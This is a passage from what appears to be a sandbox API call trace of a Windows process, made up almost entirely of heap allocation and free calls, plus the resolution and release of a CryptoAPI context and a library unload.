lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0227.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0227.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0227.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0227.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0227.493] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0227.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0227.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0227.493] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0227.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0227.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0227.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.495] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.495] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.495] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.495] FreeLibrary (hLibModule=0x756e0000) returned 1 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.496] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0227.496] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0227.496] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0227.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0227.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0227.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0227.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0227.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0227.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0227.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0227.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0227.503] CloseHandle (hObject=0x2d0) returned 1 [0227.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0227.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0227.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0227.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0227.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0227.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0227.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0227.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0227.565] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0227.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0227.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0227.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0227.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0227.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0227.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0227.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0227.566] CloseHandle (hObject=0x2a0) returned 1 [0227.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0227.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0227.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0227.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0227.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0227.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0227.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0227.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f850 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa58 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0227.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f968 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9e0 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa30 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faa8 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fad0 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f990 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa80 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8a0 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0227.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7faf8 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa08 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0227.574] HeapFree (in: hHeap=0x970000, 